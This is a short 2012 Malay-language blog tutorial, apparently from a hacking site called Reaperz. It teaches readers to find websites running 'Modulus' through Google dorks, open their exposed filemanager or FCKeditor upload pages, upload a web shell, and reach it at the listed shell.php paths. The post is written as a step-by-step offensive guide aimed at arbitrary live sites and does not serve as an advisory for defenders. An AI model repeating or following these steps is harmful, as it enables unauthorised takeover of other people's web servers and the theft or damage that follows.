Tuesday, 7 August 2012

Powered by Modulus - Shell Upload Vulnerability

Assalamualaikum dan salam sejahtera.Hari ni aku nak ajar exploit yang boleh upload shell.Ok jom mula...

1. Mula2 google dork :

  • “Powered by Modulus” 
  • inurl:filemanager/libraries/
2. Seterusnya pilih salah satu web.

Exploit :
http://localhost/modules/filemanager/libraries/filemanager/filemanager.php
or
http://localhost/modules/fckeditor/libraries/fckeditor/editor/filemanager/connectors/uploadtest.html

3. Paparan dia lebih kurang macam ni :


Next click butang UPLOAD.Rujuk gambar :


Kemudian akan keluar macam ni :


Click Choose File dan UPLOAD!
Allowed File : php, html, asp, php4, txt, jpg, and more

4. Untuk tengok hasil :

http://localhost/modules/core/home/2/shell.php
or 
http://localhost/home/2/shell.php

5.DONE!

Live demo :  
Item Reviewed: Powered by Modulus - Shell Upload Vulnerability Description: Rating: 5 Reviewed By Afif Zafri

Share:

Popular Posts

© 2011 - Reaperz All rights reserved | Theme Designed by Seo Blogger Templates DMCA.com